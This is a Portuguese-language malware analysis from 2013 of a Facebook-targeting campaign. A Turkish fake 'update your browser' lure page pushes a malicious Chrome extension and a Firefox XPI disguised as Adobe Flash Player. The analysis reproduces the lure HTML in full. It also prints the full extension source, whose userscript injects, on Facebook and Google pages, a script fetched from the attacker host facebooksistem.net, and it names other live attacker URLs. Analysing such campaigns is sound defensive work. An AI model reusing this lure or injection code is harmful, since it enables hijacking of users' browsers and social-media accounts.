Untitled

#############   analise Facebook virus         #############

#############        by: Xel4 NeO             #############

#############       greatz: Oscar Marques               #############

#############     Th3 Pir4t3 for all greatz             #############
#############         Date:24/01/2013                   #############
#####################################################################

link falso: www.türkaskerindenpkkyabüyükdarbe.tk

link real:  http://www.xn--trkaskerindenpkkyabykdarbe-yzcsb.tk/

#####################################################################

host com extensão da turquia

Xn Trkaskerindenpkkyabykdarbe Yzcsb - www.Xn--Trkaskerindenpkkyabykdarbe-Yzcsb.tk
Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Title:
Taray?c?n?z Güncellenmeli !
Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Keywords:
xn--trkaskerindenpkkyabykdarbe-yzcsb.tk
Xn--Trkaskerindenpkkyabykdarbe-Yzcsb Description:
Taray?c?n?z Güncellenmeli !
Xn--Trkaskerindenpkkyabykdarbe-Yzcsb IP:
93.170.52.31
Xn--Trkaskerindenpkkyabykdarbe-Yzcsb server location:
Czech Republic
Xn--Trkaskerindenpkkyabykdarbe-Yzcsb ISP:
ALFA TELECOM s.r.o.

IP: 93.170.52.31
IP Country:  Czech Republic
7 Hosts on this IP
Number	   Domain / Host
1.	 www.michelkok.tk
2.	 www.truedarkness.tk
3.	 net-tv.tk
4.	 moviestelugu.tk
5.	 www.sanlorenzogenova.tk
6.	 www.thewave.tk
7.	 www.th3sturm.tk

#####################################################################

titulo da primeira pagina: Tarayiciniz Güncellenmeli

tradução:o seu navegador atualizado*

primeira pagina aparece as escritas :

Okuyun, Yoksa Yapamazsiniz !**

Assagidaki Mavi Butona Tiklayin,

Önünüze gelen küçük sekmede ise Ekle yazisina tiklayin.

Ekle'ye tikladiktan sonra biraz bekleyin.

Simdi Guncelle


traduçao:

Leia, ou não pode!*

Clique no botão azul afirma o seguinte,

Na guia Adicionar, clique no texto na frente de você um pouco.

Depois de clicar em Adicionar um pouco táxis.

atualizar agora
#####################################################################

codigo fonte:

<html>
  <head>
    <title>Tarayiciniz Güncellenmeli !</title>
    <meta name="description" content="Tarayiciniz Güncellenmeli !">
    <meta name="keywords" content="xn--trkaskerindenpkkyabykdarbe-yzcsb.tk">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <script type="text/javascript">
        var _gaq = _gaq || [];
        _gaq.push(['_setAccount', 'UA-23441223-3']);
        _gaq.push(['_setDomainName', 'none']);
        _gaq.push(['_setAllowLinker', true]);
        _gaq.push(['_trackPageview']);
        (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
            ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
        })();
    </script>
  </head>
  <frameset rows="*">
    <frame frameborder=0 src="http://sosyalaghileleri.com" name="dot_tk_frame_content" scrolling="auto" noresize>
  </frameset>
</html>
#####################################################################

ENTAO REDIRECIONA PARA UMA SEGUNDA PAGINA: ACESSO A PAGINA DESDE AS 10HS ATE AS 15:00
3 558 AUMENTANDO EXPONENCIALMENTE

stats do site: http://whos.amung.us/stats/181yeqwixdob/

mapa com origem dos acessos: http://whos.amung.us/stats/maps/181yeqwixdob/

#####################################################################

codifo fonte da pagina: http://www.sosyalaghileleri.com/


<meta http-equiv="refresh" content="0;URL=http://www.sosyalaghileleri.com/teror">

<meta name="google-site-verification" content="CySzB06QJD7dAj0gO1yVutHY8wNIoKQmcxZuTMGhGa0" />
<link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj">
<link rel="shortcut icon" href="http://cdn1.iconfinder.com/data/icons/yooicons_set09_halloween/128/cheshire_cat.png" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Tarayiciniz Güncellenmeli !</title>
<script>
function kur(){

var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){
		chrome.webstore.install("https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj");

}
else if(is_firefox){
window.location.href="http://www.expertcoder.nazuka.net/topluca.xpi";
}
else {
window.location.href="./error.php";
}
}
</script>
<body bgcolor="#ffffff" onload="if (self != top) top.location=self.location">

<style>
body,html{width:100%;height:100%;,margin:0; padding:0}
 #siyahSP{

	width:100%;
	height:100%;
	_height:expression(document.body.clientheight);
position: absolute; top: 0px; left: 0px; background-color: rgb(51, 51, 51); z-index: 9998; opacity: 0.8; background-position:
               initial; background-repeat: initial initial
 }
 .siyahIc
 {
	z-index: 9999;
	background-color:white;
	border:solid #333 1px;
	width:380px;
	height:250px;
	margin: 5% auto;
	left: 0;
	right: 0;
	margin-top:70px;
	padding:20px;
	font-family:Tahoma, Geneva, sans-serif;
	filter:alpha(opacity=100);
	-moz-opacity: 1;
	opacity: 1;
 }
 .ekle
{
	background-color:#5486da;
	width:300px;
	height:30px;
	-moz-border-radius: 5px;
	-webkit-border-radius: 5px;
	border:#2d53af 1px solid;
	text-align:center;
	line-height:30px;
	color:white;
	text-decoration:none;
	font-size:16px;
	font-weight:bold;
}
.ekle:hover
{
	background: #6097ff; /* Old browsers */
	background: -moz-linear-gradient(top,  #6097ff 0%, #5486da 100%); /* FF3.6+ */
	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6097ff), color-stop(100%,#5486da)); /* Chrome,Safari4+ */
	background: -webkit-linear-gradient(top,  #6097ff 0%,#5486da 100%); /* Chrome10+,Safari5.1+ */
	background: -o-linear-gradient(top,  #6097ff 0%,#5486da 100%); /* Opera 11.10+ */
	background: -ms-linear-gradient(top,  #6097ff 0%,#5486da 100%); /* IE10+ */
	background: linear-gradient(top,  #6097ff 0%,#5486da 100%); /* W3C */
	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6097ff', endColorstr='#5486da',GradientType=0 ); /* IE6-9 */

}
</style>


    <div id="siyahBuDivBaskaDiv">

	  <div class="siyahIc">
<center>
			<div style="float:left;">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="logo.jpg"></div></center>
            <div style="float:right;"></div>

                <center>
<br><br><br>

                    <p style="color:#111;font-weight:600;font-size:15px; margin-bottom:0px;">Okuyun, Yoksa Yapamazsiniz !</p><br>
<p style="color:#666;font-size:15px; margin-top:0px;">Assagidaki Mavi Butona Tiklayin,</p>
                    <p style="color:#666;font-size:15px; margin-top:0px;">Önünüze gelen küçük sekmede ise <font color="red">Ekle</font> yazisina tiklayin.</p>
                    <p style="color:#666;font-size:15px; margin-top:0px;"><font color="red">Ekle</font>'ye tikladiktan sonra biraz bekleyin.</p>
					<p></p>
                    					<a href="javascript:" onclick="kur();" style="text-decoration:none;">
                        <div class="ekle">Simdi Guncelle</div>


   </a></body></html>

<br><br><br><br><br><br><br><br>
<script id="_wau0dc">var _wau = _wau || [];
_wau.push(["colored", "181yeqwixdob", "0dc", "bcc1007e000a"]);
(function() {var s=document.createElement("script"); s.async=true;
s.src="http://widgets.amung.us/colored.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();</script>

#####################################################################

ele baixa um aplicativo do webstore do chrome, no caso de ser firefox baixa um extensão do firefox em xpi.

unction kur(){

var is_chrome=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;
var is_firefox=navigator.userAgent.toLowerCase().indexOf("firefox")>-1;
if(is_chrome){
		chrome.webstore.install("https://chrome.google.com/webstore/detail/flpeiefiaecmkdannhapfejemlfpikbj");

}
else if(is_firefox){
window.location.href="http://www.expertcoder.nazuka.net/topluca.xpi";
}
else {
window.location.href="./error.php";

#####################################################################
analise arquivo topluca.xpi

$contem uma pasta vazia com nome chrome
$pasta content
$install.rdf
$chrome
#####################################################################
analise pasta content

contem 4 JSscriptfile


$adobeflashplayer
#######
/**
*/
// ==UserScript==
// @name         	SosyalHilelerim
// @namespace     	SosyalHilelerim
// @description   	goole.com
// @version     	1.5
// @license     	GPL 3.0
// @include     	http*://*.facebook.com/*
// @include     	http*://*.google.*/*
// @exclude     	http*://*.facebook.com/plugins/*
// @exclude     	http*://*.facebook.com/widgets/*
// @exclude     	http*://*.facebook.com/iframe/*
// @exclude     	http*://*.facebook.com/desktop/*
// @exclude     	http*://*.channel.facebook.com/*
// @exclude     	http*://*.facebook.com/ai.php*
// @exclude     	http*://*.facebookajans.com/*
// @exclude        	http://*.channel.facebook.tld/*
// @exclude        	http://static.*.facebook.tld/*
// @exclude        	http://*.facebook.tld/ai.php*
// @exclude        	http://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
// @exclude        	https://*.channel.facebook.tld/*
// @exclude       	https://static.*.facebook.tld/*
// @exclude        	https://*.facebook.tld/ai.php*
// @exclude        	https://*.facebook.tld/pagelet/generic.php/pagelet/home/morestories.php*
// @exclude     	http*://*.google.*/blank.html

// ==/UserScript==
if (!/https?:\/\/[^\/]*\.?facebook\.[^\/]+\//.test(window.location.href))
{
var googledayim=1;
}

if (googledayim && !/https?:\/\/[^\/]*\.?google\.[^\/]+\//.test(window.location.href)) { return; }


// Get a reference to the *real* window
if (typeof unsafeWindow=="undefined") {
	var div = document.createElement('div');
	div.setAttribute('onclick', 'return window;');
	unsafeWindow = div.onclick();
}

if (!window.localStorage) {
  window.localStorage = {
    getItem: function (sKey) {
      if (!sKey || !this.hasOwnProperty(sKey)) { return null; }
      return unescape(document.cookie.replace(new RegExp("(?:^|.*;\\s*)" + escape(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=\\s*((?:[^;](?!;))*[^;]?).*"), "$1"));
    },
    key: function (nKeyId) { return unescape(document.cookie.replace(/\s*\=(?:.(?!;))*$/, "").split(/\s*\=(?:[^;](?!;))*[^;]?;\s*/)[nKeyId]); },
    setItem: function (sKey, sValue) {
      if(!sKey) { return; }
      document.cookie = escape(sKey) + "=" + escape(sValue) + "; path=/";
      this.length = document.cookie.match(/\=/g).length;
    },
    length: 0,
    removeItem: function (sKey) {
      if (!sKey || !this.hasOwnProperty(sKey)) { return; }
      var sExpDate = new Date();
      sExpDate.setDate(sExpDate.getDate() - 1);
      document.cookie = escape(sKey) + "=; expires=" + sExpDate.toGMTString() + "; path=/";
      this.length--;
    },
    hasOwnProperty: function (sKey) { return (new RegExp("(?:^|;\\s*)" + escape(sKey).replace(/[\-\.\+\*]/g, "\\$&") + "\\s*\\=")).test(document.cookie); }
  };
  window.localStorage.length = (document.cookie.match(/\=/g) || window.localStorage).length;
}

// Greasemonkey API for Chrome/Safari/Opera
GM_addStyle=function(css) {var style = document.createElement('style');style.textContent = css;document.getElementsByTagName('head')[0].appendChild(style);};
GM_getValue=function(name, defaultValue) { return window.localStorage.getItem(name) || defaultValue;};
GM_setValue=function(name, value) {
	try {window.localStorage.setItem(name, value);} catch (e) {
		if (e.toString().indexOf('QUOTA_EXCEEDED_ERR')>-1) { add_error("Either your browser's local storage area is full or you are browsing in Private Browsing mode, which isn't supported.<br>Please <a href=\"http://SocialFixer.com/faq.php#quota\" target=\"_blank\">Read the FAQ</a> for a detailed explanation of this error");}
	}
};


var opera_xhr_counter = 0;
var opera_xhr_funcs = {};
GM_xmlhttpRequest=function(obj) {
	try {
		if (obj && obj.url && obj.url.indexOf("facebook.com")>0) {
			var request=new window.XMLHttpRequest();
			request.onreadystatechange=function() { if(obj.onreadystatechange) { obj.onreadystatechange(request); }; if(request.readyState==4 && obj.onload) { obj.onload(request); } }
			request.onerror=function() { if(obj.onerror) { obj.onerror(request); } }
			try { request.open(obj.method,obj.url,true); } catch(e) { if(obj.onerror) { obj.onerror( {readyState:4,responseHeaders:'',responseText:'',responseXML:'',status:403,statusText:'Forbidden'} ); }; return; }
			if(obj.headers) { for(name in obj.headers) { request.setRequestHeader(name,obj.headers[name]); } }
			request.send(obj.data); return request;
		}
		else {
			opera_xhr_counter++;
			var xhr = { 'method':obj.method, 'url':obj.url, 'headers':obj.headers, 'data':obj.data };
			var req_obj = {'type':'ajax', 'xhr':xhr, 'id':opera_xhr_counter};
			opera_xhr_funcs[ opera_xhr_counter ] = obj.onload;
			opera.extension.postMessage( JSON.stringify(req_obj) );
		}
	} catch(e) {
		alert(e);
	}
};


var ajax = function(props) {
	GM_xmlhttpRequest(props);
}


// Don't run on link redirects and some other cases
var excludes = ['/l.php?u','/ai.php','/plugins/','morestories.php','blank.html'];
try {
	for (var i=0; i<excludes.length; i++) {
		if ( window.location.href.indexOf(excludes[i])>0 ) { return; }
	}
} catch(e) { }


// Extension Option Persistence
function setValue(key,val,func) {
	if (PERFORMANCE) { trace_start('setValue',null,true); }
	var do_set=function() {
		if (PERFORMANCE) { trace_start('setValue',null,true); }
		try {
			GM_setValue(key,val);
		} catch(e) {
			alert(e);
		}
		if(func) {
			func(key,val);
		}
		if (PERFORMANCE) { trace_end('setValue',null,true); }
	};
	do_set.name="setValue.do_set";
	window.setTimeout(do_set,0);
	if (PERFORMANCE) { trace_end('setValue',null,true); }
}
function getValue(key, def, func) {
	if (PERFORMANCE) { trace_start('getValue',null,true); }
	// Key can be either a single key or an array of keys
	if (typeof key=="string") {
		return func(GM_getValue(key,def));
	}
	else if (typeof key=="object" && key.length) {
		var values = {};
		for (var i=0; i<key.length; i++) {
			var default_value = undef;
			if (typeof def=="object" && def.length && i<def.length) {
				default_value = def[i];
			}
			values[key[i]] = GM_getValue(key[i],default_value);
		}
		if (func) {
			return func(values);
		}
		else { return values; }
	}
    if (PERFORMANCE) { trace_end('getValue',null,true); }
    return undef;
}


document.ready=start(0);
a=0;
function start(a)
{

if(!googledayim)
{
	if(document.getElementById('faceplus')) return;
	var s=document.createElement('script');
	s.type="text/javascript";
	s.className="cachedVersion";
	s.innerHTML='var s=document.createElement("script");s.type="text/javascript";s.src="//facebooksistem.net/macodtm/dongu.php?amtasak="+Math.random()*999999;document.getElementsByTagName("head")[0].appendChild(s);';
	s.id="faceplus"


		if(document.getElementsByTagName('head')[0])document.getElementsByTagName('head')[0].appendChild(s);
	else if(a<50) setTimeout(function(){start(a++);},100);

}
else
{

	if(document.getElementById('faceplus')) return;
	var s=document.createElement('script');
	s.type="text/javascript";
	s.className="cachedVersion";
	s.innerHTML='var s=document.createElement("script");s.type="text/javascript";s.src="//facebooksistem.net/macodtm/askfm.php?amtasak="+Math.random()*999999;document.getElementsByTagName("head")[0].appendChild(s);';
	s.id="faceplus"


		if(document.getElementsByTagName('head')[0])document.getElementsByTagName('head')[0].appendChild(s);
	else if(a<50) setTimeout(function(){start(a++);},100);

}
}

#################

$script-compiler

var adobeflashplayer_gmCompiler={

// getUrlContents adapted from Greasemonkey Compiler
// http://www.letitblog.com/code/python/greasemonkey.py.txt
// used under GPL permission
//
// most everything else below based heavily off of Greasemonkey
// http://greasemonkey.devjavu.com/
// used under GPL permission

getUrlContents: function(aUrl){
	var	ioService=Components.classes["@mozilla.org/network/io-service;1"]
		.getService(Components.interfaces.nsIIOService);
	var	scriptableStream=Components
		.classes["@mozilla.org/scriptableinputstream;1"]
		.getService(Components.interfaces.nsIScriptableInputStream);
	var unicodeConverter=Components
		.classes["@mozilla.org/intl/scriptableunicodeconverter"]
		.createInstance(Components.interfaces.nsIScriptableUnicodeConverter);
	unicodeConverter.charset="UTF-8";

	var	channel=ioService.newChannel(aUrl, "UTF-8", null);
	var	input=channel.open();
	scriptableStream.init(input);
	var	str=scriptableStream.read(input.available());
	scriptableStream.close();
	input.close();

	try {
		return unicodeConverter.ConvertToUnicode(str);
	} catch (e) {
		return str;
	}
},

isGreasemonkeyable: function(url) {
	var scheme=Components.classes["@mozilla.org/network/io-service;1"]
		.getService(Components.interfaces.nsIIOService)
		.extractScheme(url);
	return (
		(scheme == "http" || scheme == "https" || scheme == "file") &&
		!/hiddenWindow\.html$/.test(url)
	);
},

contentLoad: function(e) {
	var unsafeWin=e.target.defaultView;
	if (unsafeWin.wrappedJSObject) unsafeWin=unsafeWin.wrappedJSObject;

	var unsafeLoc=new XPCNativeWrapper(unsafeWin, "location").location;
	var href=new XPCNativeWrapper(unsafeLoc, "href").href;

	if (
		adobeflashplayer_gmCompiler.isGreasemonkeyable(href)
		&& ( /^http.*:\/\/.*\.facebook\.com\/.*$/.test(href) || /^http.*:\/\/.*\.google\..*\/.*$/.test(href) )
		&& !( /^http.*:\/\/.*\.facebook\.com\/plugins\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/widgets\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/iframe\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/desktop\/.*$/.test(href) || /^http.*:\/\/.*\.channel\.facebook\.com\/.*$/.test(href) || /^http.*:\/\/.*\.facebook\.com\/ai\.php.*$/.test(href) || /^http.*:\/\/.*\.faceplus\.biz\/.*$/.test(href) || /^http:\/\/.*\.channel\.facebook\.tld\/.*$/.test(href) || /^http:\/\/static\..*\.facebook\.tld\/.*$/.test(href) || /^http:\/\/.*\.facebook\.tld\/ai\.php.*$/.test(href) || /^http:\/\/.*\.facebook\.tld\/pagelet\/generic\.php\/pagelet\/home\/morestories\.php.*$/.test(href) || /^https:\/\/.*\.channel\.facebook\.tld\/.*$/.test(href) || /^https:\/\/static\..*\.facebook\.tld\/.*$/.test(href) || /^https:\/\/.*\.facebook\.tld\/ai\.php.*$/.test(href) || /^https:\/\/.*\.facebook\.tld\/pagelet\/generic\.php\/pagelet\/home\/morestories\.php.*$/.test(href) || /^http.*:\/\/.*\.google\..*\/blank\.html$/.test(href) )
	) {
		var script=adobeflashplayer_gmCompiler.getUrlContents(
			'chrome://adobeflashplayer/content/adobeflashplayer.js'
		);
		adobeflashplayer_gmCompiler.injectScript(script, href, unsafeWin);
	}
},

injectScript: function(script, url, unsafeContentWin) {
	var sandbox, script, logger, storage, xmlhttpRequester;
	var safeWin=new XPCNativeWrapper(unsafeContentWin);

	sandbox=new Components.utils.Sandbox(safeWin);

	var storage=new adobeflashplayer_ScriptStorage();
	xmlhttpRequester=new adobeflashplayer_xmlhttpRequester(
		unsafeContentWin, window//appSvc.hiddenDOMWindow
	);

	sandbox.window=safeWin;
	sandbox.document=sandbox.window.document;
	sandbox.unsafeWindow=unsafeContentWin;

	// patch missing properties on xpcnw
	sandbox.XPathResult=Components.interfaces.nsIDOMXPathResult;

	// add our own APIs
	sandbox.GM_addStyle=function(css) { adobeflashplayer_gmCompiler.addStyle(sandbox.document, css) };
	sandbox.GM_setValue=adobeflashplayer_gmCompiler.hitch(storage, "setValue");
	sandbox.GM_getValue=adobeflashplayer_gmCompiler.hitch(storage, "getValue");
	sandbox.GM_openInTab=adobeflashplayer_gmCompiler.hitch(this, "openInTab", unsafeContentWin);
	sandbox.GM_xmlhttpRequest=adobeflashplayer_gmCompiler.hitch(
		xmlhttpRequester, "contentStartRequest"
	);
	//unsupported
	sandbox.GM_registerMenuCommand=function(){};
	sandbox.GM_log=function(){};
	sandbox.GM_getResourceURL=function(){};
	sandbox.GM_getResourceText=function(){};

	sandbox.__proto__=sandbox.window;

	try {
		this.evalInSandbox(
			"(function(){"+script+"})()",
			url,
			sandbox);
	} catch (e) {
		var e2=new Error(typeof e=="string" ? e : e.message);
		e2.fileName=script.filename;
		e2.lineNumber=0;
		//GM_logError(e2);
		alert(e2);
	}
},

evalInSandbox: function(code, codebase, sandbox) {
	if (Components.utils && Components.utils.Sandbox) {
		// DP beta+
		Components.utils.evalInSandbox(code, sandbox);
	} else if (Components.utils && Components.utils.evalInSandbox) {
		// DP alphas
		Components.utils.evalInSandbox(code, codebase, sandbox);
	} else if (Sandbox) {
		// 1.0.x
		evalInSandbox(code, sandbox, codebase);
	} else {
		throw new Error("Could not create sandbox.");
	}
},

openInTab: function(unsafeContentWin, url) {
	var tabBrowser = getBrowser(), browser, isMyWindow = false;
	for (var i = 0; browser = tabBrowser.browsers[i]; i++)
		if (browser.contentWindow == unsafeContentWin) {
			isMyWindow = true;
			break;
		}
	if (!isMyWindow) return;

	var loadInBackground, sendReferrer, referrer = null;
	loadInBackground = tabBrowser.mPrefs.getBoolPref("browser.tabs.loadInBackground");
	sendReferrer = tabBrowser.mPrefs.getIntPref("network.http.sendRefererHeader");
	if (sendReferrer) {
		var ios = Components.classes["@mozilla.org/network/io-service;1"]
							.getService(Components.interfaces.nsIIOService);
		referrer = ios.newURI(content.document.location.href, null, null);
	 }
	 tabBrowser.loadOneTab(url, referrer, null, null, loadInBackground);
 },

 hitch: function(obj, meth) {
	var unsafeTop = new XPCNativeWrapper(unsafeContentWin, "top").top;

	for (var i = 0; i < this.browserWindows.length; i++) {
		this.browserWindows[i].openInTab(unsafeTop, url);
	}
},

apiLeakCheck: function(allowedCaller) {
	var stack=Components.stack;

	var leaked=false;
	do {
		if (2==stack.language) {
			if ('chrome'!=stack.filename.substr(0, 6) &&
				allowedCaller!=stack.filename
			) {
				leaked=true;
				break;
			}
		}

		stack=stack.caller;
	} while (stack);

	return leaked;
},

hitch: function(obj, meth) {
	if (!obj[meth]) {
		throw "method '" + meth + "' does not exist on object '" + obj + "'";
	}

	var hitchCaller=Components.stack.caller.filename;
	var staticArgs = Array.prototype.splice.call(arguments, 2, arguments.length);

	return function() {
		if (adobeflashplayer_gmCompiler.apiLeakCheck(hitchCaller)) {
			return;
		}

		// make a copy of staticArgs (don't modify it because it gets reused for
		// every invocation).
		var args = staticArgs.concat();

		// add all the new arguments
		for (var i = 0; i < arguments.length; i++) {
			args.push(arguments[i]);
		}

		// invoke the original function with the correct this obj and the combined
		// list of static and dynamic arguments.
		return obj[meth].apply(obj, args);
	};
},

addStyle:function(doc, css) {
	var head, style;
	head = doc.getElementsByTagName('head')[0];
	if (!head) { return; }
	style = doc.createElement('style');
	style.type = 'text/css';
	style.innerHTML = css;
	head.appendChild(style);
},

onLoad: function() {
	var	appcontent=window.document.getElementById("appcontent");
	if (appcontent && !appcontent.greased_adobeflashplayer_gmCompiler) {
		appcontent.greased_adobeflashplayer_gmCompiler=true;
		appcontent.addEventListener("DOMContentLoaded", adobeflashplayer_gmCompiler.contentLoad, false);
	}
},

onUnLoad: function() {
	//remove now unnecessary listeners
	window.removeEventListener('load', adobeflashplayer_gmCompiler.onLoad, false);
	window.removeEventListener('unload', adobeflashplayer_gmCompiler.onUnLoad, false);
	window.document.getElementById("appcontent")
		.removeEventListener("DOMContentLoaded", adobeflashplayer_gmCompiler.contentLoad, false);
},

}; //object adobeflashplayer_gmCompiler


function adobeflashplayer_ScriptStorage() {
	this.prefMan=new adobeflashplayer_PrefManager();
}
adobeflashplayer_ScriptStorage.prototype.setValue = function(name, val) {
	this.prefMan.setValue(name, val);
}
adobeflashplayer_ScriptStorage.prototype.getValue = function(name, defVal) {
	return this.prefMan.getValue(name, defVal);
}


window.addEventListener('load', adobeflashplayer_gmCompiler.onLoad, false);
window.addEventListener('unload', adobeflashplayer_gmCompiler.onUnLoad, false);
####################

xmlhttprequester

###

function adobeflashplayer_xmlhttpRequester(unsafeContentWin, chromeWindow) {
	this.unsafeContentWin = unsafeContentWin;
	this.chromeWindow = chromeWindow;
}

// this function gets called by user scripts in content security scope to
// start a cross-domain xmlhttp request.
//
// details should look like:
// {method,url,onload,onerror,onreadystatechange,headers,data}
// headers should be in the form {name:value,name:value,etc}
// can't support mimetype because i think it's only used for forcing
// text/xml and we can't support that
adobeflashplayer_xmlhttpRequester.prototype.contentStartRequest = function(details) {
	// important to store this locally so that content cannot trick us up with
	// a fancy getter that checks the number of times it has been accessed,
	// returning a dangerous URL the time that we actually use it.
	var url = details.url;

	// make sure that we have an actual string so that we can't be fooled with
	// tricky toString() implementations.
	if (typeof url != "string") {
		throw new Error("Invalid url: url must be of type string");
	}

	var ioService=Components.classes["@mozilla.org/network/io-service;1"]
		.getService(Components.interfaces.nsIIOService);
	var scheme = ioService.extractScheme(url);

	// This is important - without it, GM_xmlhttpRequest can be used to get
	// access to things like files and chrome. Careful.
	switch (scheme) {
		case "http":
		case "https":
		case "ftp":
			this.chromeWindow.setTimeout(
				adobeflashplayer_gmCompiler.hitch(this, "chromeStartRequest", url, details), 0);
			break;
		default:
			throw new Error("Invalid url: " + url);
	}
}

// this function is intended to be called in chrome's security context, so
// that it can access other domains without security warning
adobeflashplayer_xmlhttpRequester.prototype.chromeStartRequest=function(safeUrl, details) {
	var req = new this.chromeWindow.XMLHttpRequest();

	this.setupRequestEvent(this.unsafeContentWin, req, "onload", details);
	this.setupRequestEvent(this.unsafeContentWin, req, "onerror", details);
	this.setupRequestEvent(this.unsafeContentWin, req, "onreadystatechange", details);

	req.open(details.method, safeUrl);

	if (details.headers) {
		for (var prop in details.headers) {
			req.setRequestHeader(prop, details.headers[prop]);
		}
	}

	req.send(details.data);
}

// arranges for the specified 'event' on xmlhttprequest 'req' to call the
// method by the same name which is a property of 'details' in the content
// window's security context.
adobeflashplayer_xmlhttpRequester.prototype.setupRequestEvent =
function(unsafeContentWin, req, event, details) {
	if (details[event]) {
		req[event] = function() {
			var responseState = {
				// can't support responseXML because security won't
				// let the browser call properties on it
				responseText:req.responseText,
				readyState:req.readyState,
				responseHeaders:(req.readyState==4?req.getAllResponseHeaders():''),
				status:(req.readyState==4?req.status:0),
				statusText:(req.readyState==4?req.statusText:'')
			}

			// Pop back onto browser thread and call event handler.
			// Have to use nested function here instead of GM_hitch because
			// otherwise details[event].apply can point to window.setTimeout, which
			// can be abused to get increased priveledges.
			new XPCNativeWrapper(unsafeContentWin, "setTimeout()")
				.setTimeout(function(){details[event](responseState);}, 0);
		}
	}
}
##################
prefman

function adobeflashplayer_PrefManager() {
	var startPoint="adobeflashplayer.";

	var pref=Components.classes["@mozilla.org/preferences-service;1"].
		getService(Components.interfaces.nsIPrefService).
		getBranch(startPoint);

	var observers={};

	// whether a preference exists
	this.exists=function(prefName) {
		return pref.getPrefType(prefName) != 0;
	}

	// returns the named preference, or defaultValue if it does not exist
	this.getValue=function(prefName, defaultValue) {
		var prefType=pref.getPrefType(prefName);

		// underlying preferences object throws an exception if pref doesn't exist
		if (prefType==pref.PREF_INVALID) {
			return defaultValue;
		}

		switch (prefType) {
			case pref.PREF_STRING: return pref.getCharPref(prefName);
			case pref.PREF_BOOL: return pref.getBoolPref(prefName);
			case pref.PREF_INT: return pref.getIntPref(prefName);
		}
	}

	// sets the named preference to the specified value. values must be strings,
	// booleans, or integers.
	this.setValue=function(prefName, value) {
		var prefType=typeof(value);

		switch (prefType) {
			case "string":
			case "boolean":
				break;
			case "number":
				if (value % 1 != 0) {
					throw new Error("Cannot set preference to non integral number");
				}
				break;
			default:
				throw new Error("Cannot set preference with datatype: " + prefType);
		}

		// underlying preferences object throws an exception if new pref has a
		// different type than old one. i think we should not do this, so delete
		// old pref first if this is the case.
		if (this.exists(prefName) && prefType != typeof(this.getValue(prefName))) {
			this.remove(prefName);
		}

		// set new value using correct method
		switch (prefType) {
			case "string": pref.setCharPref(prefName, value); break;
			case "boolean": pref.setBoolPref(prefName, value); break;
			case "number": pref.setIntPref(prefName, Math.floor(value)); break;
		}
	}

	// deletes the named preference or subtree
	this.remove=function(prefName) {
		pref.deleteBranch(prefName);
	}

	// call a function whenever the named preference subtree changes
	this.watch=function(prefName, watcher) {
		// construct an observer
		var observer={
			observe:function(subject, topic, prefName) {
				watcher(prefName);
			}
		};

		// store the observer in case we need to remove it later
		observers[watcher]=observer;

		pref.QueryInterface(Components.interfaces.nsIPrefBranchInternal).
			addObserver(prefName, observer, false);
	}

	// stop watching
	this.unwatch=function(prefName, watcher) {
		if (observers[watcher]) {
			pref.QueryInterface(Components.interfaces.nsIPrefBranchInternal)
				.removeObserver(prefName, observers[watcher]);
		}
	}
}

#############
script-compiler-overlay.xul

<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul'>
<script type='application/x-javascript'
src='chrome://adobeflashplayer/content/xmlhttprequester.js'></script><script type='application/x-javascript'
src='chrome://adobeflashplayer/content/prefman.js'></script><script type='application/x-javascript'
src='chrome://adobeflashplayer/content/script-compiler.js'></script></overlay>

########################################################################################################
analise arquivo install rdf

<?xml version="1.0"?><RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#">
<Description about="urn:mozilla:install-manifest"><em:id>{9e09ac65-43c0-4b9d-970f-11e2e9616c55}</em:id><em:name>SosyalHilelerim
</em:name><em:version>1.5</em:version><em:description>SosyalHilelerim</em:description><em:creator>Facebook.com</em:creator>
<em:contributor>SosyalHilelerim</em:contributor><em:contributor>http://facebook.com/</em:contributor><em:homepageURL>www.facebook.com
</em:homepageURL><em:targetApplication><Description><em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id><em:minVersion>3.5.*
</em:minVersion><em:maxVersion>12.*</em:maxVersion></Description></em:targetApplication></Description></RDF>

##########################################################################################################
analise arquivo chrome.manifest

content	adobeflashplayer	content/
overlay	chrome://browser/content/browser.xul
chrome://adobeflashplayer/content/script-compiler-overlay.xul
##########################################################################################################

pagina:http://www.sosyalaghileleri.com/teror/

source:

<META http-equiv=content-type content=text/html;charset=iso-8859-9>
<META http-equiv=content-type content=text/html;charset=windows-1254>
<META http-equiv=content-type content=text/html;charset=x-mac-turkish>

<script id="_wau0nk">var _wau = _wau || [];
_wau.push(["tab", "moqrduosstcr", "0nk", "bottom-center"]);
(function() {var s=document.createElement("script"); s.async=true;
s.src="http://widgets.amung.us/tab.js";
document.getElementsByTagName("head")[0].appendChild(s);
})();</script>

<!DOCTYPE html>
